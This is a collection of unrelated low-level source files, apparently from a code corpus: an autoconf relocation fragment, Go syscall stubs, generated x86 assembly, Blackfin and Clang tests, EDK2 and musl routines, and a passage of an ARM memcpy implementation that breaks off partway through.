-e "s,\\\${prefix},$acl_final_prefix," `
acl_final_moduledir=`echo "${moduledir}" | sed \
-e "s,\\\${localstatedir},$localstatedir," \
-e "s,\\\${pkgdatadir},$pkgdatadir," \
-e "s,\\\${datadir},$datadir," \
-e "s,\\\${docdir},$docdir," \
-e "s,\\\${datarootdir},$datarootdir," \
-e "s,\\\${pkglibdir},$acl_final_pkglibdir," \
-e "s,\\\${libdir},$acl_final_libdir," \
-e "s,\\\${exec_prefix},$acl_final_exec_prefix," \
-e "s,\\\${prefix},$acl_final_prefix," `
# If shared libraries are enabled, there are a few extra constraints.
if test "$enable_shared" != no; then
case $host in
*-*-cygwin* | *-*-mingw*)
# For Windows, the shared library will be installed in bindir anyway
;;
*-gnu*)
# For glibc, we can use a relative rpath via -Wl,-rpath,...
case "$acl_final_libdir" in
"${acl_final_exec_prefix}"/*) ;;
/*) relocatable_reason='no, libdir outside exec_prefix' ;;
*) relocatable_reason='no, relative libdir' ;;
esac
;;
*)
relocatable_reason="no,
relocatable shared libraries not supported on $host"
;;
esac
fi
# Further OS-independent tests ensure that we can make relative
# paths from the executable's location.
# Each of bindir/libexecdir must be an absolute path under exec_prefix,
# and datadir/imagedir/moduledir an absolute path under prefix;
# otherwise relocation is disabled and the reason is recorded.
# The expansions in the case patterns are quoted (matching the bindir
# check below) so that any glob metacharacters in the configured
# prefix are matched literally instead of being treated as patterns.
if test "$relocatable_reason" = yes; then
case "${acl_final_bindir}" in
"${acl_final_exec_prefix}") ;;
"${acl_final_exec_prefix}"/*) ;;
/*) relocatable_reason='no, bindir outside exec_prefix' ;;
*) relocatable_reason='no, relative bindir' ;;
esac
case "${acl_final_libexecdir}" in
"${acl_final_exec_prefix}") ;;
"${acl_final_exec_prefix}"/*) ;;
/*) relocatable_reason='no, libexecdir outside exec_prefix' ;;
*) relocatable_reason='no, relative libexecdir' ;;
esac
case "${acl_final_datadir}" in
"${acl_final_prefix}") ;;
"${acl_final_prefix}"/*) ;;
/*) relocatable_reason='no, datadir outside prefix' ;;
*) relocatable_reason='no, relative datadir' ;;
esac
case "${acl_final_imagedir}" in
"${acl_final_prefix}") ;;
"${acl_final_prefix}"/*) ;;
/*) relocatable_reason='no, imagedir outside prefix' ;;
*) relocatable_reason='no, relative imagedir' ;;
esac
case "${acl_final_moduledir}" in
"${acl_final_prefix}") ;;
"${acl_final_prefix}"/*) ;;
/*) relocatable_reason='no, moduledir outside prefix' ;;
*) relocatable_reason='no, relative moduledir' ;;
esac
# Paths are computed relative to the executable only, so a split
# prefix/exec_prefix installation cannot be made relocatable.
test "$acl_final_prefix" != "$acl_final_exec_prefix" && \
relocatable_reason='no, prefix does not match exec prefix'
fi
# echo the relative path from ${acl_final_bindir} to $1
# (Works only if both are absolute.)
[func_make_relpath ()
{
dir=$1
idir=${acl_final_bindir}
# Strip the common leading components of dir and idir one at a time.
while true; do
dfirst=`echo "$dir" | sed -n -e 's,^//*\([^/]*\).*$,/\1,p'`
ifirst=`echo "$idir" | sed -n -e 's,^//*\([^/]*\).*$,/\1,p'`
test x"$dfirst" = x && break
test x"$ifirst" = x && break
test "$dfirst" != "$ifirst" && break
dir=`echo "$dir" | sed -e 's,^//*[^/]*,,'`
idir=`echo "$idir" | sed -e 's,^//*[^/]*,,'`
done
# Turn each remaining component of idir into "..", then append what
# is left of dir; "." if the result would otherwise be empty.
idir=`echo "$idir" | sed -e 's,//*[^/]*,/..,g' -e 's,^/,,' `
echo "${idir:-.}$dir"
}]
case "$relocatable_reason" in
yes)
# Command-line option to include a relative search path for
# shared libraries
if test "$enable_shared" != no; then
case "$host" in
*-linux*)
RELOC_LDFLAGS='-Wl,-rpath,"\$$ORIGIN/'`func_make_relpath ${acl_final_libdir}`'"'
;;
esac
fi
# Relocatable install: bake executable-relative paths into config.h.
KERNEL_PATH=`func_make_relpath ${acl_final_pkgdatadir}/kernel`
IMAGE_PATH=`func_make_relpath ${acl_final_imagedir}`
MODULE_PATH=`func_make_relpath ${acl_final_moduledir}`
LIBEXEC_PATH=`func_make_relpath "${acl_final_libexecdir}/${PACKAGE}"`
PREFIX=`func_make_relpath "${acl_final_prefix}"`
EXEC_PREFIX=`func_make_relpath "${acl_final_exec_prefix}"`
AC_DEFINE_UNQUOTED(KERNEL_PATH, "$KERNEL_PATH",
[The relative path from the program to the kernel path.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(IMAGE_PATH, "$IMAGE_PATH",
[The relative path from the program to the image path.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(MODULE_PATH, "$MODULE_PATH",
[The relative path from the program to the module path.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(LIBEXEC_PATH, "$LIBEXEC_PATH",
[The relative path from the program to the per-package
libexec path. Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(PREFIX, "$PREFIX",
[The relative path from the program to the prefix.
Defined only for relocatable installs.])
AC_DEFINE_UNQUOTED(EXEC_PREFIX, "$EXEC_PREFIX",
[The relative path from the program to the exec_prefix.
Defined only for relocatable installs.])
;;
*)
# Pass paths on the command-line to allow specifying a prefix at "make"
# time.
RELOC_CPPFLAGS='-DKERNEL_PATH=\""${pkgdatadir}/kernel"\" \
-DIMAGE_PATH=\""${imagedir}"\" \
-DMODULE_PATH=\""${moduledir}"\" \
-DLIBEXEC_PATH=\""${libexecdir}/${PACKAGE}"\" \
-DPREFIX=\""${prefix}"\" \
-DEXEC_PREFIX=\""${exec_prefix}"\" '
;;
esac
# The default executable path is always passed at compile time.
RELOC_CPPFLAGS=$RELOC_CPPFLAGS' \
-DDEFAULT_EXECUTABLE=\""${bindir}/gst${EXEEXT}"\"'
AC_MSG_RESULT([$relocatable_reason])
AC_SUBST(RELOC_CPPFLAGS)
AC_SUBST(RELOC_LDFLAGS)
dnl
dnl ------------------------------- FILE GENERATION -----------
{ echo; echo "${term_bold}Output substitutions:${term_norm}"; } >& AS_MESSAGE_FD
AC_CONFIG_COMMANDS_PRE([
LTLIBOBJS=`echo "$LIB@&t@OBJS" |
sed 's,\.[[^.]]* ,.lo ,g;s,\.[[^.]]*$,.lo,'`
LTALLOCA=`echo "$ALLOCA" | sed 's/\.o/.lo/g'`
])
GST_RUN='$(top_builddir)/gst -I $(top_builddir)/gst.im -f'
AC_SUBST(GST_RUN)
AC_SUBST(CFLAGS)
AC_SUBST(INCLTDL)
AC_SUBST(LIBLTDL)
AC_SUBST(LTALLOCA)
AC_SUBST(LTLIBOBJS)
dnl Scripts & data files
AC_CONFIG_FILES(gnu-smalltalk.pc)
AC_CONFIG_FILES(gst-config, chmod +x gst-config)
AC_CONFIG_FILES(tests/gst, chmod +x tests/gst)
AC_CONFIG_FILES(tests/atlocal)
dnl Master Makefile
AC_CONFIG_FILES(Makefile)
dnl VM makefiles
AC_CONFIG_FILES(doc/Makefile lib-src/Makefile libgst/Makefile)
AC_CONFIG_FILES(opcode/Makefile lightning/Makefile tests/Makefile)
AC_OUTPUT
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for AMD64, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
// Error-returning variants simply tail-jump to package syscall,
// which performs the errno decoding.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
// SyscallNoError(trap, a1, a2, a3 uintptr) (r1, r2 uintptr)
// Like Syscall but skips errno handling; still notifies the runtime
// scheduler around the (possibly blocking) system call.
TEXT ·SyscallNoError(SB),NOSPLIT,$0-48
CALL runtime·entersyscall(SB)
// Linux AMD64 syscall ABI: args in DI, SI, DX, R10, R8, R9.
MOVQ a1+8(FP), DI
MOVQ a2+16(FP), SI
MOVQ a3+24(FP), DX
MOVQ $0, R10
MOVQ $0, R8
MOVQ $0, R9
MOVQ trap+0(FP), AX // syscall entry
SYSCALL
// Raw kernel return values; no errno translation is done here.
MOVQ AX, r1+32(FP)
MOVQ DX, r2+40(FP)
CALL runtime·exitsyscall(SB)
RET
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
// RawSyscallNoError: no scheduler notification, no errno decoding.
// Safe only for calls that cannot block.
TEXT ·RawSyscallNoError(SB),NOSPLIT,$0-48
MOVQ a1+8(FP), DI
MOVQ a2+16(FP), SI
MOVQ a3+24(FP), DX
MOVQ $0, R10
MOVQ $0, R8
MOVQ $0, R9
MOVQ trap+0(FP), AX // syscall entry
SYSCALL
MOVQ AX, r1+32(FP)
MOVQ DX, r2+40(FP)
RET
// gettimeofday is forwarded so the vDSO fast path in package
// syscall is used.
TEXT ·gettimeofday(SB),NOSPLIT,$0-16
JMP syscall·gettimeofday(SB)
| {
"language": "Assembly"
} |
/* Compiler-generated C-- runtime bookkeeping symbols. */
.globl main
.globl Cmm.global_area
.globl Cmm.globalsig.aQOYZWMPACZAJaMABGMOZeCCPY
.section .data
/* memory for global registers */
Cmm.globalsig.aQOYZWMPACZAJaMABGMOZeCCPY:
Cmm.global_area:
.globl Cmm_stack_growth
.section .data
.align 4
/* Stack growth direction flag: -1 (0xffffffff) here. */
Cmm_stack_growth:
.long 0xffffffff
.section .text
/* main: calls tryout(3) and tryout(4), then returns 0.
   Generated code; the register shuffling below is unoptimized output. */
main:
leal -4(%esp), %esp
/* The next three loads read the incoming stack arguments; each result
   is overwritten by the following sequence (dead code from codegen). */
leal 4(%esp), %eax
movl $4,%ecx
addl %ecx,%eax
movl (%eax),%eax
leal 4(%esp), %eax
movl $8,%ecx
addl %ecx,%eax
movl (%eax),%eax
leal 4(%esp), %eax
movl (%eax),%eax
.Linitialize_continuations_l4:
.Lproc_body_start_l3:
/* First call: argument 3 passed in %eax. */
movl $3,%ecx
movl %eax,(%esp)
movl %ecx,%eax
call tryout
.Lcall_successor_l11:
/* Second call: argument 4 in %eax. */
movl $4,%eax
call tryout
.Lcall_successor_l8:
/* Return 0; restore the saved word and pop the frame. */
movl $0,%eax
leal 4(%esp), %ecx
movl $0,%edx
addl %edx,%ecx
movl (%esp),%edx
movl %edx,(%ecx)
leal 4(%esp), %esp
ret
/* PC-map records for main's two call sites: the runtime uses these
   tables to describe the stack frame at each return address. */
.section .pcmap_data
.Lstackdata_l17:
.long 0
.section .pcmap
.long .Lcall_successor_l11
.long .Lframe_l18
.section .pcmap_data
.Lframe_l18:
.long 0x80000004
.long 0xfffffffc
.long 0xfffffffc
.long .Lstackdata_l17
.long 0
.long 2
.long 0
.long 1
.long 0
.long 0
.long 0
.section .pcmap
.long .Lcall_successor_l8
.long .Lframe_l19
.section .pcmap_data
.Lframe_l19:
.long 0x80000004
.long 0xfffffffc
.long 0xfffffffc
.long .Lstackdata_l17
.long 0
.long 2
.long 0
.long 1
.long 0
.long 0
.long 0
.section .text
.section .text
/* tryout(n): prints "%d low bit is zero/nonzero" depending on n & 1.
   Argument arrives in %eax; calls printf with (fmt, n) on the stack. */
tryout:
leal -20(%esp), %esp
leal 20(%esp), %ecx
movl (%ecx),%ecx
.Linitialize_continuations_l21:
.Lproc_body_start_l20:
.Lbranch_target_l29:
.Lbranch_target_l33:
/* Test the low bit of the argument. */
movl $1,%edx
movl %eax,8(%esp)
andl %edx,%eax
movl $0,%edx
cmpl %edx,%eax
jne .Lbranch_target_l28
.Lbranch_target_l27:
/* Even: select the "zero" format string. */
leal z,%eax
jmp .Lbranch_target_l26
.Lbranch_target_l28:
/* Odd: select the "nonzero" format string. */
leal nz,%eax
.Lbranch_target_l26:
/* Store the printf arguments (format, value) into the out-args area. */
leal 20(%esp), %edx
movl %eax,12(%esp)
movl $-20,%eax
addl %eax,%edx
movl 12(%esp),%eax
movl %eax,(%edx)
leal 20(%esp), %eax
movl $-16,%edx
addl %edx,%eax
movl 8(%esp),%edx
movl %edx,(%eax)
movl %ecx,16(%esp)
call printf
.Lcall_successor_l25:
/* Restore the saved incoming word and pop the frame. */
leal 20(%esp), %eax
movl $0,%ecx
addl %ecx,%eax
movl 16(%esp),%ecx
movl %ecx,(%eax)
leal 20(%esp), %esp
ret
/* PC-map record for tryout's printf call site. */
.section .pcmap_data
.Lstackdata_l36:
.long 0
.section .pcmap
.long .Lcall_successor_l25
.long .Lframe_l37
.section .pcmap_data
.Lframe_l37:
.long 0x80000004
.long 0xffffffec
.long 0xfffffffc
.long .Lstackdata_l36
.long 0
.long 2
.long 0
.long 1
.long 0
.long 0
.long 0
.section .text
.section .data
/* nz: NUL-terminated ASCII for "%d low bit is nonzero\n" */
nz:
.byte 37
.byte 100
.byte 32
.byte 108
.byte 111
.byte 119
.byte 32
.byte 98
.byte 105
.byte 116
.byte 32
.byte 105
.byte 115
.byte 32
.byte 110
.byte 111
.byte 110
.byte 122
.byte 101
.byte 114
.byte 111
.byte 10
.byte 0
/* z: NUL-terminated ASCII for "%d low bit is zero\n" */
z:
.byte 37
.byte 100
.byte 32
.byte 108
.byte 111
.byte 119
.byte 32
.byte 98
.byte 105
.byte 116
.byte 32
.byte 105
.byte 115
.byte 32
.byte 122
.byte 101
.byte 114
.byte 111
.byte 10
.byte 0
| {
"language": "Assembly"
} |
//Original:/testcases/core/c_ldst_st_p_p/c_ldst_st_p_p.dsp
// Spec Reference: c_ldst st_p_p
# mach: bfin
.include "testutils.inc"
start
// Seed the data registers with distinctive values.
imm32 r0, 0x0a231507;
imm32 r1, 0x1b342618;
imm32 r2, 0x2c453729;
imm32 r3, 0x3d56483a;
imm32 r4, 0x4e67594b;
imm32 r5, 0x5f786a5c;
imm32 r6, 0x60897b6d;
imm32 r7, 0x719a8c7e;
// initial values p-p
imm32 p5, 0x0a231507;
imm32 p1, 0x1b342618;
imm32 p2, 0x2c453729;
// P4 and FP point at scratch memory in the .data tables below.
loadsym p4, DATA_ADDR_5;
loadsym fp, DATA_ADDR_6;
// Store P registers through pointers, read back via R registers.
[ P4 ] = P1;
[ FP ] = P2;
R5 = [ P4 ];
R6 = [ FP ];
CHECKREG r5, 0x1B342618;
CHECKREG r6, 0x2C453729;
// Mix P-register and R-register stores.
[ P4 ] = P2;
[ FP ] = R3;
R5 = [ P4 ];
R6 = [ FP ];
CHECKREG r5, 0x2C453729;
CHECKREG r6, 0x3D56483A;
// And the converse pairing.
[ P4 ] = R3;
[ FP ] = P5;
R5 = [ P4 ];
R6 = [ FP ];
CHECKREG r5, 0x3D56483A;
CHECKREG r6, 0x0A231507;
pass
// Pre-load memory with known data
// More data is defined than will actually be used
// Each table holds 8 (or 16) words with a recognizable byte ramp,
// so a wrong-address load is easy to spot in CHECKREG failures.
.data
DATA_ADDR_1:
.dd 0x00010203
.dd 0x04050607
.dd 0x08090A0B
.dd 0x0C0D0E0F
.dd 0x10111213
.dd 0x14151617
.dd 0x18191A1B
.dd 0x1C1D1E1F
DATA_ADDR_2:
.dd 0x20212223
.dd 0x24252627
.dd 0x28292A2B
.dd 0x2C2D2E2F
.dd 0x30313233
.dd 0x34353637
.dd 0x38393A3B
.dd 0x3C3D3E3F
DATA_ADDR_3:
.dd 0x40414243
.dd 0x44454647
.dd 0x48494A4B
.dd 0x4C4D4E4F
.dd 0x50515253
.dd 0x54555657
.dd 0x58595A5B
.dd 0x5C5D5E5F
DATA_ADDR_4:
.dd 0x60616263
.dd 0x64656667
.dd 0x68696A6B
.dd 0x6C6D6E6F
.dd 0x70717273
.dd 0x74757677
.dd 0x78797A7B
.dd 0x7C7D7E7F
DATA_ADDR_5:
.dd 0x80818283
.dd 0x84858687
.dd 0x88898A8B
.dd 0x8C8D8E8F
.dd 0x90919293
.dd 0x94959697
.dd 0x98999A9B
.dd 0x9C9D9E9F
DATA_ADDR_6:
.dd 0xA0A1A2A3
.dd 0xA4A5A6A7
.dd 0xA8A9AAAB
.dd 0xACADAEAF
.dd 0xB0B1B2B3
.dd 0xB4B5B6B7
.dd 0xB8B9BABB
.dd 0xBCBDBEBF
DATA_ADDR_7:
.dd 0xC0C1C2C3
.dd 0xC4C5C6C7
.dd 0xC8C9CACB
.dd 0xCCCDCECF
.dd 0xD0D1D2D3
.dd 0xD4D5D6D7
.dd 0xD8D9DADB
.dd 0xDCDDDEDF
.dd 0xE0E1E2E3
.dd 0xE4E5E6E7
.dd 0xE8E9EAEB
.dd 0xECEDEEEF
.dd 0xF0F1F2F3
.dd 0xF4F5F6F7
.dd 0xF8F9FAFB
.dd 0xFCFDFEFF
| {
"language": "Assembly"
} |
# long long llrintl(long double x) -- i386 cdecl.
# Rounds x to the nearest integer using the x87 current rounding mode
# and returns a 64-bit result in edx:eax.
.global llrintl
.type llrintl,@function
llrintl:
fldt 4(%esp)           # load the 80-bit long double argument
fistpll 4(%esp)        # round to int64 (current mode), store in place
mov 4(%esp),%eax       # low 32 bits of the result
mov 8(%esp),%edx       # high 32 bits of the result
ret
| {
"language": "Assembly"
} |
// Tests for instrumentation of C++ methods, constructors, and destructors.
// RUN: %clang %s -o - -emit-llvm -S -fprofile-instr-generate -fno-exceptions -target %itanium_abi_triple > %tgen
// RUN: FileCheck --input-file=%tgen -check-prefix=CTRGEN %s
// RUN: FileCheck --input-file=%tgen -check-prefix=DTRGEN %s
// RUN: FileCheck --input-file=%tgen -check-prefix=MTHGEN %s
// RUN: FileCheck --input-file=%tgen -check-prefix=WRPGEN %s
// RUN: llvm-profdata merge %S/Inputs/cxx-class.proftext -o %t.profdata
// RUN: %clang %s -o - -emit-llvm -S -fprofile-instr-use=%t.profdata -fno-exceptions -target %itanium_abi_triple > %tuse
// RUN: FileCheck --input-file=%tuse -check-prefix=CTRUSE %s
// RUN: FileCheck --input-file=%tuse -check-prefix=DTRUSE %s
// RUN: FileCheck --input-file=%tuse -check-prefix=MTHUSE %s
// RUN: FileCheck --input-file=%tuse -check-prefix=WRPUSE %s
// Test fixture: each member function contains one conditional so the
// instrumentation emits exactly two counters per function.  The
// interleaved FileCheck directives match the generated IR; do not
// change the code, since the .proftext counts depend on it.
class Simple {
int Member;
public:
// CTRGEN-LABEL: define {{.*}} @_ZN6SimpleC2Ei(
// CTRUSE-LABEL: define {{.*}} @_ZN6SimpleC2Ei(
// CTRGEN: store {{.*}} @[[SCC:__llvm_profile_counters__ZN6SimpleC2Ei]], i64 0, i64 0
explicit Simple(int Member) : Member(Member) {
// CTRGEN: store {{.*}} @[[SCC]], i64 0, i64 1
// CTRUSE: br {{.*}} !prof ![[SC1:[0-9]+]]
if (Member) {}
// CTRGEN-NOT: store {{.*}} @[[SCC]],
// CTRUSE-NOT: br {{.*}} !prof ![0-9]+
// CTRUSE: ret
}
// CTRUSE: ![[SC1]] = !{!"branch_weights", i32 100, i32 2}
// DTRGEN-LABEL: define {{.*}} @_ZN6SimpleD2Ev(
// DTRUSE-LABEL: define {{.*}} @_ZN6SimpleD2Ev(
// DTRGEN: store {{.*}} @[[SDC:__llvm_profile_counters__ZN6SimpleD2Ev]], i64 0, i64 0
~Simple() {
// DTRGEN: store {{.*}} @[[SDC]], i64 0, i64 1
// DTRUSE: br {{.*}} !prof ![[SD1:[0-9]+]]
if (Member) {}
// DTRGEN-NOT: store {{.*}} @[[SDC]],
// DTRUSE-NOT: br {{.*}} !prof ![0-9]+
// DTRUSE: ret
}
// DTRUSE: ![[SD1]] = !{!"branch_weights", i32 100, i32 2}
// MTHGEN-LABEL: define {{.*}} @_ZN6Simple6methodEv(
// MTHUSE-LABEL: define {{.*}} @_ZN6Simple6methodEv(
// MTHGEN: store {{.*}} @[[SMC:__llvm_profile_counters__ZN6Simple6methodEv]], i64 0, i64 0
void method() {
// MTHGEN: store {{.*}} @[[SMC]], i64 0, i64 1
// MTHUSE: br {{.*}} !prof ![[SM1:[0-9]+]]
if (Member) {}
// MTHGEN-NOT: store {{.*}} @[[SMC]],
// MTHUSE-NOT: br {{.*}} !prof ![0-9]+
// MTHUSE: ret
}
// MTHUSE: ![[SM1]] = !{!"branch_weights", i32 100, i32 2}
};
// WRPGEN-LABEL: define {{.*}} @_Z14simple_wrapperv(
// WRPUSE-LABEL: define {{.*}} @_Z14simple_wrapperv(
// WRPGEN: store {{.*}} @[[SWC:__llvm_profile_counters__Z14simple_wrapperv]], i64 0, i64 0
// Runs the fixture 100 times, giving the 100/101-iteration branch
// weights matched by the USE prefixes below.
void simple_wrapper() {
// WRPGEN: store {{.*}} @[[SWC]], i64 0, i64 1
// WRPUSE: br {{.*}} !prof ![[SW1:[0-9]+]]
for (int I = 0; I < 100; ++I) {
Simple S(I);
S.method();
}
// WRPGEN-NOT: store {{.*}} @[[SWC]],
// WRPUSE-NOT: br {{.*}} !prof ![0-9]+
// WRPUSE: ret
}
// WRPUSE: ![[SW1]] = !{!"branch_weights", i32 101, i32 2}
// Entry point: drives the instrumented wrapper once; argc/argv unused.
int main(int argc, const char *argv[]) {
simple_wrapper();
return 0;
}
| {
"language": "Assembly"
} |
/*
* The MIT License
*
* Copyright (c) 2004-, Kohsuke Kawaguchi, Sun Microsystems, Inc., and a number of other of contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
/**
* Code that deals with HUDSON_HOME on EBS, which is used in
* conjunction with our EC2 launch wizard.
*
* <p>
* This should eventually move to its own plugin, but for
* now I'm putting this here.
*/
package hudson.plugins.ec2.ebs; | {
"language": "Assembly"
} |
/** @file
AsmReadMm6 function
Copyright (c) 2006 - 2008, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials
are licensed and made available under the terms and conditions of the BSD License
which accompanies this distribution. The full text of the license may be found at
http://opensource.org/licenses/bsd-license.php.
THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
**/
/**
Reads the current value of 64-bit MMX Register #6 (MM6).
Reads and returns the current value of MM6. This function is only available
on IA-32 and x64.
@return The current value of MM6.
**/
UINT64
EFIAPI
AsmReadMm6 (
VOID
)
{
_asm {
// Two pushes carve an 8-byte slot on the stack for the MMX store.
push eax
push eax
movq [esp], mm6
// Pop low dword into eax, high dword into edx: the UINT64 return
// value is thus left in edx:eax as the compiler expects.
pop eax
pop edx
// Leave MMX state so subsequent x87 FPU use is safe.
emms
}
}
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2014 ARM Ltd
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the company may not be used to endorse or promote
* products derived from this software without specific prior written
* permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LTD ``AS IS'' AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL ARM LTD BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "acle-compat.h"
/* NOTE: This ifdef MUST match the one in aeabi_memcpy.c. */
#if defined (__ARM_ARCH_7A__) && defined (__ARM_FEATURE_UNALIGNED) && \
(defined (__ARM_NEON__) || !defined (__SOFTFP__))
.syntax unified
.global __aeabi_memcpy
.type __aeabi_memcpy, %function
/* void __aeabi_memcpy(void *dst r0, const void *src r1, size_t n r2)
   ARMv7-A implementation relying on hardware unaligned LDR/STR support.
   Preserves r0 across the call (saved/restored on the stack). */
__aeabi_memcpy:
/* Assumes that n >= 0, and dst, src are valid pointers.
If there is at least 8 bytes to copy, use LDRD/STRD.
If src and dst are misaligned with different offsets,
first copy byte by byte until dst is aligned,
and then copy using LDRD/STRD and shift if needed.
When less than 8 left, copy a word and then byte by byte. */
/* Save registers (r0 holds the return value):
optimized push {r0, r4, r5, lr}.
To try and improve performance, stack layout changed,
i.e., not keeping the stack looking like users expect
(highest numbered register at highest address). */
push {r0, lr}
strd r4, r5, [sp, #-8]!
/* Get copying of tiny blocks out of the way first. */
/* Is there at least 4 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_4 /* If n < 4. */
/* Check word alignment. */
ands ip, r0, #3 /* ip = last 2 bits of dst. */
bne dst_not_word_aligned /* If dst is not word-aligned. */
/* Get here if dst is word-aligned. */
ands ip, r1, #3 /* ip = last 2 bits of src. */
bne src_not_word_aligned /* If src is not word-aligned. */
word_aligned:
/* Get here if source and dst both are word-aligned.
The number of bytes remaining to copy is r2+4. */
/* Is there is at least 64 bytes to copy? */
subs r2, r2, #60
blt copy_less_than_64 /* If r2 + 4 < 64. */
/* First, align the destination buffer to 8-bytes,
to make sure double loads and stores don't cross cache line boundary,
as they are then more expensive even if the data is in the cache
(require two load/store issue cycles instead of one).
If only one of the buffers is not 8-bytes aligned,
then it's more important to align dst than src,
because there is more penalty for stores
than loads that cross cacheline boundary.
This check and realignment are only worth doing
if there is a lot to copy. */
/* Get here if dst is word aligned,
i.e., the 2 least significant bits are 0.
If dst is not 2w aligned (i.e., the 3rd bit is not set in dst),
then copy 1 word (4 bytes). */
ands r3, r0, #4
beq two_word_aligned /* If dst already two-word aligned. */
ldr r3, [r1], #4
str r3, [r0], #4
subs r2, r2, #4
blt copy_less_than_64
two_word_aligned:
/* TODO: Align to cacheline (useful for PLD optimization). */
/* Every loop iteration copies 64 bytes. */
1:
.irp offset, #0, #8, #16, #24, #32, #40, #48, #56
ldrd r4, r5, [r1, \offset]
strd r4, r5, [r0, \offset]
.endr
add r0, r0, #64
add r1, r1, #64
subs r2, r2, #64
bge 1b /* If there is more to copy. */
copy_less_than_64:
/* Get here if less than 64 bytes to copy, -64 <= r2 < 0.
Restore the count if there is more than 7 bytes to copy. */
adds r2, r2, #56
blt copy_less_than_8
/* Copy 8 bytes at a time. */
2:
ldrd r4, r5, [r1], #8
strd r4, r5, [r0], #8
subs r2, r2, #8
bge 2b /* If there is more to copy. */
copy_less_than_8:
/* Get here if less than 8 bytes to copy, -8 <= r2 < 0.
Check if there is more to copy. */
cmn r2, #8
beq return /* If r2 + 8 == 0. */
/* Restore the count if there is more than 3 bytes to copy. */
adds r2, r2, #4
blt copy_less_than_4
/* Copy 4 bytes. */
ldr r3, [r1], #4
str r3, [r0], #4
copy_less_than_4:
/* Get here if less than 4 bytes to copy, -4 <= r2 < 0. */
/* Restore the count, check if there is more to copy. */
adds r2, r2, #4
beq return /* If r2 == 0. */
/* Get here with r2 is in {1,2,3}={01,10,11}. */
/* Logical shift left r2, insert 0s, update flags. */
lsls r2, r2, #31
/* Copy byte by byte.
Condition ne means bit 0 of r2 is set (the shifted result is
nonzero), i.e., r2 is 1 or 3: copy one byte.
Condition cs means bit 1 of r2 was shifted out into the carry,
i.e., r2 is 2 or 3: copy two bytes. */
itt ne
ldrbne r3, [r1], #1
strbne r3, [r0], #1
itttt cs
ldrbcs r4, [r1], #1
ldrbcs r5, [r1]
strbcs r4, [r0], #1
strbcs r5, [r0]
return:
/* Restore registers: optimized pop {r0, r4, r5, pc} */
ldrd r4, r5, [sp], #8
pop {r0, pc} /* This is the only return point of memcpy. */
dst_not_word_aligned:
/* Get here when dst is not aligned and ip has the last 2 bits of dst,
i.e., ip is the offset of dst from word.
The number of bytes that remains to copy is r2 + 4,
i.e., there are at least 4 bytes to copy.
Write a partial word (0 to 3 bytes), such that dst becomes
word-aligned. */
/* If dst is at ip bytes offset from a word (with 0 < ip < 4),
then there are (4 - ip) bytes to fill up to align dst to the next
word. */
rsb ip, ip, #4 /* ip = #4 - ip. */
cmp ip, #2
/* Copy byte by byte with conditionals. */
itt gt
ldrbgt r3, [r1], #1
strbgt r3, [r0], #1
itt ge
ldrbge r4, [r1], #1
strbge r4, [r0], #1
ldrb lr, [r1], #1
strb lr, [r0], #1
/* Update the count.
ip holds the number of bytes we have just copied. */
subs r2, r2, ip /* r2 = r2 - ip. */
blt copy_less_than_4 /* If r2 < ip. */
